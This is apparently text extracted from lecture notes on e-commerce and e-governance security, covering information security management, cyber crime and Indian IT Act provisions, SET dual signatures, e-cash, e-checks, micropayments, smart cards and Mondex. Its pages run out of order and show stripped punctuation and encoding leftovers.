1 INTRODUCTION The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions In particular the networking potential offered by the Internet and related technologies have the potential to transform the structures and operation of government
The effective management of information security is a key factor as willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have on the data security of this service
2 INFORMATION SECURITY A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens
The process approach for information security management system ISMS encourages its users to emphasize the importance of
understanding an organizationrsquos information security requirements and the need to establish policy and objectives for information security
implementing and operating controls to manage an organizations information security risks in the context of the organizationrsquos overall business risks
monitoring and reviewing the performance and effectiveness of the ISMS continual improvement based on objective measurement
Data security requires a set of security requirements Authentication capability to identify who is using the services (person or software program) Processes of verifying that you are who you say you are Authorization capability to give rights access to resources Process to verify someone have the rights to do what she is trying to do Confidentiality capability to prevent unauthorized access to information Integrity capability to prevent information from unauthorized modification and ensuring that information can be relied upon and is accurate and complete Traceability capability to chronologically interrelate any transaction to a person or system that performed the action in a way that is verifiable Non-repudiation capability to prevent the intervening person or system in an event or action to denying or challenging their participation on the event
Example of organizational and technical measures to prevent unauthorized access and processing are shown
Protecting premises equipment and systems software including input-output units
PREPARED BY ARUN PRATAP SINGH 53
53
Protecting software applications used to process personal data Preventing unauthorized access to personal data during transmission thereof including
transmission via telecommunication means and networks Ensuring effective methods of blocking destruction erasure or anonymization of
personal data Enabling subsequent determination of when individual personal data were entered into a
filing system used or otherwise processed and the person responsible for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data
Despite trusted security and privacy measures constitutes a crucial success factor for e-Government that has not been yet addressed as UN 2012 Survey shows only 20 of national portals clearly indicate the presence of security features Europe is leading with 44 countries displaying secure links on their national websites but survey do not consider regional and local websites and neither the many decentralized public organization web portals
3 INFORMATION SECURITY THREATS Services provided by e-Government to citizens enterprise public officer government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats Detailed examples of cyber attacks using techniques like packet sniffer probe malware internet infrastructure attack denial of services attack remote to local attack and user to root attack The successful adoption of an ISMS is important to protect information assets allowing an organization to
Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis
Maintain a structured and comprehensive framework for identifying and assessing information security risks selecting and applying applicable controls and measuring and improving their effectiveness
Continually improve its control environment Effectively achieve legal and regulatory compliance
There are simple and well-known web application vulnerabilities that could be avoided but e- Government webs are still vulnerable A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection SQL injection attack can compromise data integrity while XSS is a vulnerability which attackers may exploit to steal users information
Specific security measures like firewalls intrusion detection software encryption and secure networks must be defined designed and implemented for government agencies to provide the appropriate levels of security But information security must also take into consideration the people and processes that rely on the systems Employees with daily access to e-Government systems must be trained on cybersecurity and this aspect must become part of their job A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies
PREPARED BY ARUN PRATAP SINGH 54
54
CYBER CRIME AND LAWS
The expression lsquoCrimersquo is defined as an act which subjects the doer to legal punishment
or any offence against morality social order or any unjust or shameful act The ldquoOffence
is defined in the Code of Criminal Procedure to mean as an act or omission made
punishable by any law for the time being in force
Cyber Crime is emerging as a serious threat World wide governments police
departments and intelligence units have started to react
Cyber Crime is a term used to broadly describe criminal activity in which computers or
computer networks are a tool a target or a place of criminal activity and include everything
from electronic cracking to denial of service attacks It is also used to include traditional
crimes in which computers or networks are used to enable the illicit activity
Computer crime mainly consists of unauthorized access to computer systems data
alteration data destruction theft of intellectual property Cyber crime in the context of
national security may involve hacking traditional espionage or information warfare and
related activities
Pornography Threatening Email Assuming someones Identity Sexual Harassment
Defamation Spam and Phishing are some examples where computers are used to commit
crime whereas Viruses Worms and Industrial Espionage Software Piracy and Hacking
are examples where computers become target of crime
Cyber Crime Variants
Hacking
Hacking is a crime which entails cracking systems and gaining unauthorized access to the data
stored in them Hacking had witnessed a 37 per cent increase this year
Cyber Squatting
Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune
This is an issue that has not been tackled in IT ACT 2000
Phishing is just one of the many frauds on the Internet trying to fool people into parting with their
money Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions
requesting them to enter their Username Password or other personal information to access their
Account for some reason
The fraudster then has access to the customers online bank account and to the funds contained
in that account
Cyber Stalking is use of the Internet or other electronic means to stalk someone This term is
used interchangeably with online harassment and online abuse Stalking generally involves
harassing or threatening behaviour that an individual engages in repeatedly such as following a
person appearing at a persons home or place of business making harassing phone calls leaving
written messages or objects or vandalizing a persons property
PREPARED BY ARUN PRATAP SINGH 55
55
Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access
to private personal and financial information from the public for the purpose of financial reward
The term is a combination of ldquoVoice and phishing Vishing exploits the publics trust in landline
telephone services
Vishing is typically used to steal credit card numbers or other information used in identity theft
schemes from individuals
A rapidly growing online user base
121 Million Internet Users
65 Million Active Internet Users up by 28 from 51 million in 2010
50 Million users shop online on Ecommerce and Online Shopping Sites
46+ Million Social Network Users
346 million mobile users had subscribed to Data Packages
PREPARED BY ARUN PRATAP SINGH 56
56
CYBER LAW
(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or
Damage to the public or any person Destroys or Deletes or Alters any Information
Residing in a Computer Resource or diminishes its value or utility or affects it injuriously
by any means commits hack
(2) Whoever commits hacking shall be punished with imprisonment up to three years or with
fine which may extend up to two lakh rupees or with both
Whoever without permission of the owner of the computer
Secures Access
Downloads Copies or extracts any data computer database or any
information
Introduce or causes to be introduce any Virus or Contaminant
Disrupts or causes disruption
Denies or causes denial of access to any person
Provides any assistance to any person to facilitate access
Charges the services availed of by a person to the account of
another person by Tampering with or Manipulating any Computer
Computer System or Computer Network
Shall be liable to pay damages by way of compensation not exceeding one crore rupees
to the person so affected
Section ndash 43
Destroys Deletes or Alters any Information residing in a computer resource or diminishes its
value or utility or affects it injuriously by any means
Steals conceals destroys or alters or causes any person to steal conceal destroy or alter any
computer source code used for a computer resource with an intention to cause damage
ldquoIf any person dishonestly or fraudulently does any act referred to in section 43 he shall be
punishable with imprisonment for a term which may extend to two three years or with fine which
may extend to five lakh rupees or with bothrdquo [S66]
S66A - Punishment for sending offensive messages through communication service etc
Any person who sends by means of a computer resource or a communication device
Any information that is grossly offensive or has menacing character or
PREPARED BY ARUN PRATAP SINGH 57
57
Any information which he knows to be false but for the purpose of causing annoyance
inconvenience danger obstruction insult injury criminal intimidation enmity hatred or
ill will persistently makes by making use of such computer resource or a communication
device
Any electronic mail or electronic mail message for the purpose of causing annoyance or
inconvenience or to deceive or to mislead the addressee or recipient about the origin of
such messages
Shall be punishable with imprisonment for a term which may extend to three years and with
fine
S 66C - Punishment for identity theft
ldquoWhoever fraudulently or dishonestly make use of the electronic signature password or
any other unique identification feature of any other person shall be punished with imprisonment
of either description for a term which may extend to three years and shall also be liable to fine
which may extend to rupees one lakhrdquo
S 66D - Punishment for cheating by personation by using computer resource
ldquoWhoever by means of any communication device or computer resource cheats by
personation shall be punished with imprisonment of either description for a term which may
extend to three years and shall also be liable to fine which may extend to one lakh rupees ldquo
S 66E - Punishment for violation of privacy
ldquoWhoever intentionally or knowingly captures publishes or transmits the image of a private
area of any person without his or her consent under circumstances violating the privacy of that
person shall be punished with imprisonment which may extend to three years or with fine not
exceeding two lakh rupees or with bothrdquo
S 67 A - Punishment for publishing or transmitting of material containing sexually
explicit act etc in electronic form
ldquoWhoever publishes or transmits or causes to be published or transmitted in the electronic form
any material which contains sexually explicit act or conduct shall be punished on first conviction
with imprisonment of either description for a term which may extend to five years and with fine
which may extend to ten lakh rupeesrdquo
S 67 C - Preservation and Retention of information by intermediaries
ldquo(1) Intermediary shall preserve and retain such information as may be specified for such
duration and in such manner and format as the Central Government may prescribe
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section
(1) shall be punished with an imprisonment for a term which may extend to three years and shall
also be liable to finerdquo
PREPARED BY ARUN PRATAP SINGH 58
58
IT ACT
The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of
the Indian Parliament (No 21 of 2000) notified on October 17 2000 This act is being opposed
by Save Your Voice campaign and other civil society organizations in India User-review and
consumer social networking site MouthShutcom has filed a writ petition in the Supreme Court of
India to repeal and nullify parts of IT Act 2000
The United Nations General Assembly by resolution ARES51162 dated the 30 January 1997
has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission
on International Trade Law This is referred to as the UNCITRAL Model Law on E-Commerce
Following the UN Resolution India passed the Information Technology Act 2000 in May 2000
which came into force on October 17 2000 The Information Technology Act 2000 has been
substantially amended through the Information Technology (Amendment) Act 2008 which was
passed by the two houses of the Indian Parliament on December 23 and 24 2008 It got the
Presidential assent on February 5 2009 and came into force on October 27 2009 The amended
Act has provided additional focus on information security It has added several new sections on
offences including cyber terrorism and data protection A set of Rules related to sensitive personal
information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was
notified in April 2011
Provisions ndash
Information technology Act 2000 consisted of 94 sections segregated into 13 chapters Four
schedules form part of the Act In the 2008 version of the Act there are 124 sections (excluding
5 sections that have been omitted from the earlier version) and 14 chapters Schedule I and II
have been replaced Schedules III and IV are deleted
Information Technology Act 2000 addressed the following issues
1 Legal recognition of electronic documents
2 Legal Recognition of digital signatures
3 Offenses and contraventions
4 Justice dispensation systems for cybercrimes
Offences ndash
Section Offence Punishment
65 Tampering with computer source documents - Intentional
concealment destruction or alteration of source code when the
Imprisonment up to
three years orand
PREPARED BY ARUN PRATAP SINGH 59
59
computer source code is required to be kept or maintained by
law for the time being in force
with fine up to 2 lakh
rupees
66 Hacking
Imprisonment up to
three years orand
with fine up to 5 lakh
rupees
66-A
Sending offensive message through electronic means -
Sending any information through an electronic message that is
grossly offensive or has menacing character and might cause
insult injury criminal intimidation enmity hatred or ill will etc
or sending such mail intended to deceive or to mislead the
addressee or recipient about the origin of such messages
Imprisonment up to
three years and with
fine
Criticisms-
The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December
2008 with no discussion in the House Some of the cyber law observers have criticized the
amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil
liberties of Indians There have also been appreciation about the amendments from many
observers because it addresses the issue of Cyber Security
Section 69 empowers the Central GovernmentState Government its authorized agency to
intercept monitor or decrypt any information generated transmitted received or stored in any
computer resource if it is necessary or expedient so to do in the interest of the sovereignty or
integrity of India defence of India security of the State friendly relations with foreign States or
public order or for preventing incitement to the commission of any cognizable offence or for
investigation of any offence They can also secure assistance from computer personnel in
decrypting data (see mandatory decryption) under penalty of imprisonment
Section 66A is widely criticized It has led to numerous abuses reported by the press Section 66A
has also been criticised and challenged in Lucknow and Madras High Courts for its constitutional
validity Based on Section 66A Bombay High Court has held that creating a website and storing
false information on it can entail cyber crime
PREPARED BY ARUN PRATAP SINGH 17
17
Dual signature generation and verification ndash
bull In the physical credit card system
ndash the Payment Instructions (PI) including the cardholderrsquos credit card number and
signature are not kept confidential
ndash data integrity can basically be ensured by using printed receipts
ndash cardholderrsquos authentication relies on simple signature checking only
bull In an electronic credit card system
ndash the Order Information (OI) and PI can be digitally signed to ensure data integrity
ndash the sensitive credit card information may still be disclosed to other people
bull SET introduces a novel method called the dual signature (DS) to ensure data integrity
while protecting the sensitive information
PREPARED BY ARUN PRATAP SINGH 18
18
How the merchant and the payment gateway can verify the DS
bull The merchant is provided with OI H[PI] and DS
bull The dual signature can be verified as follows
Step 1 The merchant first finds
H[ H[PI] || H[OI] ]
Step 2 He then decrypts the digital signature with the cardholderrsquos public signature key as
follows
DRSA[ DS | keypublic_sign cardholder ]
Where
keypublic_sign cardholder public signature key of the cardholder
PREPARED BY ARUN PRATAP SINGH 19
19
Step 3 Finally he compares the two terms H[H[PI] || H[OI]] and
DRSA[DS | keypublic_signcardholder ]
They should be the same if the transmitted DS has not been changed otherwise the order is
not valid
The payment gateway is provided with PI H[OI] and DS
By using the dual signature method each cardholder can link OI and PI while releasing
only the necessary information to the relevant party
If either the OI or PI is changed the dual signature will no longer be valid
DIGITAL ENVELOPE ndash
PREPARED BY ARUN PRATAP SINGH 20
20
SET PROTOCOL ndash
SET protocol has four phases initiation purchase authorization and capture
First the cardholder sends a purchase initiation request to the merchant for initializing
the payment
Then the merchant returns a response message to the cardholder
In the second phase the cardholder sends the purchase order together with the
payment instruction to the merchant
In the third phase the merchant obtains the authorization from the issuer via the
payment gateway
Finally the merchant requests a money transfer to its account
E-CASH
Electronic money is paperless cash This money is either stored on a card itself or in an account
associated with the card
The most common examples are transit cards meal plans and PayPal E-Cash can also mean
any kind of electronic payment
Electronic payment systems come in many forms including virtual cheques ATM cards credit
cards and stored value cards The usual security features for such systems are privacy
authenticity and no repudiation
There are four major components in an electronic cash system
Issuers
Customers
Merchants or traders
Regulators
Issuers can be banks or non-bank institutions
PREPARED BY ARUN PRATAP SINGH 21
21
customers are referred to users who spend E-Cash
Merchants and traders are vendors who receive E-Cash
regulators are defined as related authorities or state tax agencies
For an E-Cash transaction to occur we need to go through at least three stages
Account Setup Customers will need to obtain E-Cash accounts through certain issuers
Merchants who would like to accept E-Cash will also need to arrange accounts from
various E-Cash issuers Issuers typically handle accounting for customers and
merchants
Purchase Customers purchase certain goods or services and give the merchants
tokens which represent equivalent E-Cash Purchase information is usually encrypted
when transmitting in the networks
Authentication Merchants will need to contact E-Cash issuers about the purchase and
the amount of E-Cash involved E-Cash issuers will then authenticate the transaction
and approve the amount E-Cash involved
E-cash payment system ndash
For accessing the services online e-cash is a prime method for secure online payments
The following model shows how e cash payment system works
PREPARED BY ARUN PRATAP SINGH 22
22
This is a simple model of E-cash payment system This gives us the idea of how e-cash
payment system works The model is explained properly in upcoming slides
The customer approaches his issuer(bankrsquos) site for accessing his account The issuer in return
issues the money in form of a token which is generally in form of tens and hundreds or as per
specified by the customer
In second phase the customer will endorse those tokens to the merchant for acquiring services
for which the customer will authenticate the payment for the trader
PREPARED BY ARUN PRATAP SINGH 23
23
In third phase the trader will approach the token issuer(customerrsquos bank) and after
authenticating the tokens the issuing bank will convert the tokens into electronic fund and the
same will be transferred into traderrsquos account
Finally after getting the payment for the respective services the trader provides the requisite
service or product and also notifies the customer about the approval of payment made by
customer in traderrsquos account
A system that allows a person to pay for goods or services by transmitting a number
from one computer to another
Like the serial numbers on real currency notes the E-cash numbers are unique
This is issued by a bank and represents a specified sum of real money
PREPARED BY ARUN PRATAP SINGH 24
24
It is anonymous and reusable
Electronic Cash Security
Complex cryptographic algorithms prevent double spending
Anonymity is preserved unless double spending is attempted
Serial numbers can allow tracing to prevent money laundering
E-Cash Processing
E-cash security
Security is of extreme importance while handling the online transactions Faith in the security of
the medium of exchange whether paper or digital is essential for the economy to function
E-cash is much secure than other online payment modes because in this case no credential such
as card-passwords or anything such is involved Its like simply the online fund transfer from
customerrsquos account to traderrsquos account
PREPARED BY ARUN PRATAP SINGH 25
25
However while accessing the customerrsquos account the customer must keep in mind the internet
security sweep or theft The online hacking and cracking can be avoided by using SSL and TSL
website security systems and keeping the website link with safe ldquoHttps ldquo protocols and proper
internet security softwares to keep aside the threats of malware evasdrooping and other security
threats
Advantages
We can transfer funds purchase stocks and offer a variety of other services without
having to handle physical cash or cheques
Electronic cash protects its user against theft With electronic cash the customer does
not need to provide financial information
E-cash supports small payments Other online payment system charge a fee for every
transaction no matter how much high or low it is but e-cash has a specific limit for
additional charges thatrsquos why very low payments are not charged a fee
Limitations
Maybe how much secure the e-cash payment system is but still no one is safe against
the online frauds In this case the trader is referred as fraudulent The trader may take
the amount but may not provide the services
While making the payment its very important that the internet connection and power
supply should be active If the payment is in process and internet supply fails in between
it can lead to loss of information ie amount will be charged but it wont reach to trader
and the refund takes very long time in general the refund time is at least 30-45 days
E-Cash is not for everyone Low income segments without computer and internet access
are unable to enjoy the usage of E-Cash
The rise of E-Cash is inevitable but further improvements are needed Tackling security
anonymity low income group readiness and technology reliability issues will make E-Cash more
perfect In countries such as India where people were hesitant to use such methods has shown
a tremendous use of online payments and E-cash payment system Slowly but steadily the growth
is seen and improving it technologically will make it more reliable and efficient for customers to
use it
PREPARED BY ARUN PRATAP SINGH 26
26
E-CHECK
What is an electronic check
Itrsquos simply an electronic version of a paper check When you convert a traditional check into an electronic payment you can process it through the Automated Clearing House (ACH) Network to save time and moneymdashand because electronic checks have more security features than a paper check they better protect your business and customers Another way to think of an electronic check is when a customer pays by entering in their bank account information online and electronically sending the money Electronic checks are becoming increasingly popular because they are so fast efficient and secure Electronic checks are sometimes called eChecks electronic check conversions or Back Office Conversions (BOCs) Read more on what you need to know as you consider using eChecks in your business
eCheck a new payment instrument combining the security speed and processing efficiencies of
all-electronic transactions with the familiar and well-developed legal infrastructure and business
processes associated with paper checks is the first and only electronic payment mechanism
chosen by the United States Treasury to make high-value payments over the public Internet
How electronic checks work
The process is simple First you run a customerrsquos paper check through an electronic scanner system supplied by your merchant service provider This virtual terminal captures the customers banking information and the payment amount The information is then transferred electronically over the Federal Reserve Banks ACH Network which takes the funds from your customers account and deposits them into yours After payment approval the virtual terminal will print a receipt for the customer to sign and keep Your employee should then void the paper check and return it to the customer Yoursquoll be able to view and report on your merchant transactions online although features may vary depending on your merchant service provider or your payment processing solution provider
How does the ACH Network work with eChecks
The ACH Network is a funds distribution system that moves funds electronically from one entity to another Itrsquos a highly reliable and efficient nationwide electronic network governed by the rules of the National Automated Clearing House Association (NACHA) and the Federal Reserve (Fed) Given its ability to electronically transfer money directly to and from bank accounts ACH is a faster payment method than traditional paper checks The ACH payment process is close to the paper check process only faster Clients give their bank routing or checking account number and after verification the payment is transferred quite immediately electronically through the ACH system Besides checks the ACH Network also handles debit card transactions direct deposits of payroll Social Security and other government benefits direct debit payments and business-to-business payments
PREPARED BY ARUN PRATAP SINGH 27
27
Reaping the benefits of eChecks
Converting your customersrsquo paper checks into electronic checks helps save time and reduces hassle for your staff because you can submit payments electronically instead of making trips to the bank However time saving and hassle reduction are not the only benefits Read on for more 1 Reduce processing costs by up to 60 eChecks require less manpower to process and donrsquot come with any deposit or transaction fees As a result processing an eCheck is generally much cheaper than processing a paper check or credit card transaction 2 Receive funds sooner Businesses that use electronic check conversion have their funds deposited almost twice as fast as those using traditional check processing Billing companies often receive payments within one day 3 Increase sales If your business doesnrsquot accept paper checks offering eChecks expands your customersrsquo options and can increase sales If yoursquore converting from paper checks to eChecks you can start accepting international and out-of-state checks while using account validation and customer authentication processes to protect your business from fraud 4 Work smarter and greener Electronic check conversion is easy to set up It relies on the trusted ACH Network And eChecks help reduce the more than 674 million gallons of fuel used and 36 million tons of greenhouse gas emissions created by transporting paper checks 5 Decrease errors and fraud eChecks reduce the potential for errors and fraud because fewer people handle them Merchant service providers also maintain monitor and check files against negative account databases that store information about individuals or companies that have records of fraud
Protecting your businessmdashand your customers
Electronic check conversion is one of the most secure payment methods in the electronic payment processing industry because it uses the latest information protection features 1 Authentication Merchants must verify that the person providing the checking account information has the authority to use that account Authentication services and products available to merchants include digital signatures and public key cryptography Also known as digital certificates digital signatures encrypt data in a way that gives the receiver a more reliable indication that the information was actually sent by the sender Theyrsquore used on the Internet to confirm the identity of a customer much as a handwritten signature would Because digital signatures are difficult to tamper with or imitate and are easily transportable theyrsquore a good way to verify identity Digital signatures are often used to implement electronic signatures which include any electronic data that carries the intent of a signature Public key cryptography is a security method that uses keys to encrypt and decrypt a sent message With electronic check conversion the private key is a secret mathematical calculation used to create the digital signature on the echeck and the public key is the key given to anyone
PREPARED BY ARUN PRATAP SINGH 28
28
who needs to verify that the sender signed the echeck and that the electronic transfer has not been tampered with 2 Duplicate detection Financial institutions use software and operational controls to prevent and detect duplication of the scanned electronic representations of customer checks 3 Encryption The ACH Network automatically encrypts messages using 128-bit encryption and a secure sockets layer (SSL) How to get started with electronic checks
Herersquos how to implement electronic check conversion as quickly and easily as possible 1 Choose a well-established processing company Good pricing is important but working with a reliable processor is essential 2 Notify your customers that your business will begin using electronic check conversion Federal laws require you to post a notification about this change and give your customers a takeaway copy You must also provide customers with a phone number to request more information 3 Look for a processor that makes it easy to align your current business processes with your new electronic processing system export customer data and integrate your new system with your business management software 4 QuickBooks Payments offers a complete payment processing solution Businesses can take payments from their customers in many ways- from ACH bank payments electronic checks to credit cards including Visa MasterCard Discover and American Express In addition to offering many ways to get paid QuickBooks Payments also enables businesses to email invoices to their customers with a Pay Now button Our data shows us that businesses using QuickBooks Payments are getting paid twice as fast due to the e-invoicing feature
This diagram illustrates how real-time electronic check processing works using the CyberSource Payment Service
1 Payer (customerbill payer) is prompted to authorize electronic debit enter bank routing number (ABA) and account number
PREPARED BY ARUN PRATAP SINGH 29
29
2 Merchants sales system securely transfers order information to CyberSource over the Internet
3 CyberSource forwards bank routing number and account number to processor 4 The routing number and account number are validated and the integrity of the accounts
checking history is verified Processor forwards approvedecline results to CyberSource 5 CyberSource returns approvaldecline message to merchant 6 If approved CyberSource routes check for settlement through a processer to the
Automated Clearinghouse System (ACH) Funds are deposited in approximately 1-3 business days
Four Different Scenarios of the FSTC E-check System ndash
PREPARED BY ARUN PRATAP SINGH 30
30
MICROPAYMENT METHODS
Traditional payment methods are called macropayment methods A new type of payment method known as micropayment method is emerging to cater for
very low value transactions Example
Millicent (pre-paymentcredit based) Paywords (post-payment)
PREPARED BY ARUN PRATAP SINGH 31
31
MICRO PAYMENT IS -
Very small payments made over the Web Transactions too small for credit cards Can be as little as a fraction of a cent Alternative to subscription and advertising Can go in either direction
A micropayment is an e-commerce transaction involving a very small sum of money in exchange
for something made available online such as an application download a service or Web-based
content
Micropayments are sometimes defined as anything less than 75 cents and can be as low as a
fraction of a cent A special type of system is required for such payments which are too small to
be feasible for processing through credit card companies
Heres one scheme for micropayment The user and seller each establish an account with a third-
party service provider who monitors collects and distributes micropayments The seller encodes
per-fee links inside a Web page When the user initiates a transaction payment goes through an
Internet wallet account managed by the service provider Micropayments accumulate until they
are collected as single larger payments Such a system is helpful when a user wants to make
PREPARED BY ARUN PRATAP SINGH 32
32
one-time micropayments to multiple sellers Seller-based accounts are more common for repeat
business with an individual enterprise
Once a common micropayment standard has been established some experts predict that
streaming media sites music and application downloads content vendors sports access sites
and other specialized resources will make pay-per-use common online
Advantages and risks ndash
With a micropayment system many small transactions are summarised over a defined period of
time and charged in one bill For that reason micropayments are applicable for businesses where
even small costs for every single transaction would be inefficient 4) The main benefits from the
customer site in using micropayment are speed and flexibility From the merchantsrsquo site speed
and acceptable transaction fees are very important As the transactions involve small capital
security does not have the highest priority Much more important than trust is security User and
merchants are more likely to use an insecure payment system from a trusted company than a
secure payment system from an untrusted (unknown) company Therefore the market entry
barriers for new providers are high Any company that wishes to enter this area must have plenty
of capital and be willing to invest a lot before return on investment as it is extremely difficult for
new payment systems to achieve widespread acceptance
Payment options ndash
Micropayment providers offer various payment modules Merchants need to sign up for an account with a chosen provider and decide for a module that suits their needs The customer gets an option (or options) how to pay for desired content or goods
The most common micropayment options are listed below 6) Call2pay Payment by telephone The customer is requested to call a toll number The fee is set on a per-call basis for the desired payment amount
Handypay Payment via mobile phone bill The customer enters his or her cell phone number and receives an SMS with a TAN in order to confirm payment
Ebank2pay Payment using online banking The customer transfers the payment amount his or her online banking access and a TAN After making payment the customer receives access to the purchased product
Credit card Payment per credit card The customer enters his credit card data and confirms the transaction The transactions can be optionally carried out with the 3-D Securetrade method (verified by VISAtrade and Mastercard SecureCodetrade)
Direct debit
PREPARED BY ARUN PRATAP SINGH 33
33
Payment by direct debit The customer enters his or her bank ID and account number and confirms the direct debit authorization
PayPal MicroPayments is a micropayment system that charges payments to
users PayPal account and allows transactions of less than US$12 to take place The service is
as of 2013 offered in select currencies only
Micropayment Uses ndash
Publishing
Marketing
Software
Entertainment
Web Services
SMART CARD
A smart card chip card or integrated circuit card (ICC) is any pocket-sized card with
embedded integrated circuits Smart cards are made of plastic generally polyvinyl chloride but
sometimes polyethylene terephthalate based polyesters acrylonitrile butadiene
styrene orpolycarbonate Since April 2009 a Japanese company has manufactured reusable
financial smart cards made from paper
Smart cards can provide identification authentication data storage and application
processing[2] Smart cards may provide strong security authentication for single sign-on (SSO)
within large organizations
A smart card is any pocket-sized card with embedded integrated circuits which can
process data
This implies that it can receive input which is processed and delivered as an output
What is Smart Card
Standard credit card-sized with microchip embedded on it
Two types
Memory-only chips
Microprocessor chips
Can hold up to 32000 bytes
Newer smart cards have math co-processors
PREPARED BY ARUN PRATAP SINGH 34
34
Perform complex encryption routines quickly
In 1968 German inventors patent combination of plastic cards with micro chips
Construction of Smart Cards ndash
PREPARED BY ARUN PRATAP SINGH 35
35
PREPARED BY ARUN PRATAP SINGH 36
36
Why Smart Cards ndash
Improve the convenience and security of any transaction
Provide tamper-proof storage of user and account identity
Provide vital components of system security
Protect against a full range of security threats
Advantages ndash
Flexibility
Security
Portability
Increasing data storage capacity
Reliability
Schematic overview of a smart card
PREPARED BY ARUN PRATAP SINGH 37
37
Smart card Processing
Smart Card Applications ndash
Ticketless travel
Seoul bus system 4M cards 1B transactions since 1996
Planned the SF Bay Area system
Authentication ID
Medical records
Ecash
Store loyalty programs
Personal profiles
Government
Licenses
Mall parking
Example Mondex
PREPARED BY ARUN PRATAP SINGH 38
38
OVERVIEW OF MONDEX
Mondex is a smart card electronic cash system which was originally developed by National
Westminster Bank in the United Kingdom and subsequently sold to MasterCard International
Mondex launched in a number of markets during the 1990s expanding from an original trial in
Swindon UK to Hong Kong Guelph and New York It was also trialled on several British
university campuses from the late 1990s including the University of Edinburgh University of
Exeter (between 1997 and 2001) University of York University of Nottingham Aston
University and Sheffield Hallam University
Direct transfer of electronic money between two cards
Transfer of electronic money over the Internet or telephone networks etc
Keep transaction records
Password protection and ldquolock cardrdquo functions
Portable balance finder to check balance
Support multiple currencies
PREPARED BY ARUN PRATAP SINGH 39
39
ADVANTAGES
CONSUMER ndash
Convenience
Accessibility
On chip record of recent transactions
Home load
Internet purchases
MERCHANT ndash
Reliable-Off line payment
Higher security
Low transaction cost
Reduced cash handling
FINANCIAL INSTITUTION ndash
Strengthen customer relationships
New financial and commercial partnerships
Mondex is a concept for an electronic payment system that provides an alternate to cash particularly small currency and coins (micro-payment) The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK
In July 1996 initiated by NatWest and Midland Bank PLC Mondex International Ltd was officially established by 17 major banks from North America AsiaPacific and Europe and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept technology and brand In the same year MasterCard International acquired 51 ownership of Mondex International and fully endorsed the Mondex technology architecture
How does Mondex Protect Privacy ndash
Principles protected
o Limits for collecting personal information
o limits for using disclosing and keeping personal information
o keeping personal information accurate
o safeguarding personal information
PREPARED BY ARUN PRATAP SINGH 40
40
Limits for collecting personal information
o loads from account
o deposits into account
o lost transactions
Limits for using disclosing and keeping personal information
o safeguard deposits
o to re-imburse for non-performance
Keeping personal information accurate
o load and unload are online
o rolling 10 transactions provides exact spend and retailer name
Safeguarding personal information
o firewalls in Multos - between applications - ITSEC 6 designation
o transaction data to retailer is deliberately limited
o individual transaction data is not collected by banks - Mondex is an unaudited
system
PREPARED BY ARUN PRATAP SINGH 41
41
The design of a Mondex smart card allows end users to transfer funds electronically onto the card
and then utilize the Mondex smart card to make purchases up to the total cash value held on the
card Mondex smart cards provide an electronicpayment system using all the capabilities
associated with smart card technology The Mondex smart card can be a convenient alternative
to cash
Although the design was five years old at the time the Mondex smart card was actually launched
in 1995 ndash two years before MasterCard assumed control of the technology
The banks that currently support the Mondex smart card include National Bank of Canada
Scotiabank Canada Trust Bank of Montreal Le Mouvement des caisses Desjardins and Toronto
Dominion Bank With so many respected lending institutions banking on the idea the Mondex
smart card is worth a closer look
The Mondex smart card has the ability to make card-to-card transfers which is not possible with
standard credit or debit cards When you use a creditdebit card to make a purchase
communication is required between the bank and your card However Mondex cards contain an
embedded microprocessor with sophisticated encryption methods and tamper-proof hardware
designed to protect them from hackers The ability of the Mondex smart card to do offline
transactions means they are less dependent on expensive network infrastructure reducing
transaction costs Offline transactions may seem anonymous however they actually are recorded
in the digital memory of the cardrsquos microprocessor and remain retrievable the next time the card
is used at an ATM or as soon as the retailer uploads transaction data to the bank computer
A significant disadvantage with Mondex is that transactions arenrsquot truly anonymous Unlike pre-
paid phone cards which are also based on smart card technology you canrsquot purchase a Mondex
card without revealing your identity Each card has a unique identification number through which
owners can easily be identified Mondex smart cards have not been as successful as originally
predicted Customers have not been especially satisfied with the card and its services Unlike a
credit or debit card your money may be lost forever if you should lose a Mondex smart card
Losing a Mondex card is just like losing a wallet full of cash With a credit card yoursquore protected
against any loss exceeding $50 dollars This protection is not currently available with a Mondex
smart card
According to the Mondex smart card system it is fully auditable There is a log of the time date
amount and participants of each transaction which hampers the privacy of users Technically
however Mondex canrsquot claim to be a fully auditable system After a number of transactions
overflow can occur as a result of limited memory in the Mondex smart-cards This means that
PREPARED BY ARUN PRATAP SINGH 42
42
significant data may be lost before Mondex is able to retrieve it Critics say this loss of data is a
critical design flaw making it difficult for Mondex to reliably detect fraud
While Mondex smart cards are not a hundred percent secure they do possess the ability to tolerate
minor fraud loss
Mondex believes their electronic payment system is secure They are convinced that critics who
have voice concern over security issues are mistaken and misinformed Perhaps the use of a
Mondex smart card depends on a personal level of trust
E-GOVERNANCE
Although the term lsquoe-Governancersquo has gained currency in recent years there is no standard
definition of this term Different governments and organizations define this term to suit their own
aims and objectives Sometimes the term lsquoe-governmentrsquo is also used instead of lsquoe-
Governancersquo
Several dimensions and factors influence the definition of e-governance or electronic
governance The word ldquoelectronicrdquo in the term e-governance implies technology driven
governance E-governance is the application of information and communication technology (ICT)
for delivering government services exchange of information communication transactions
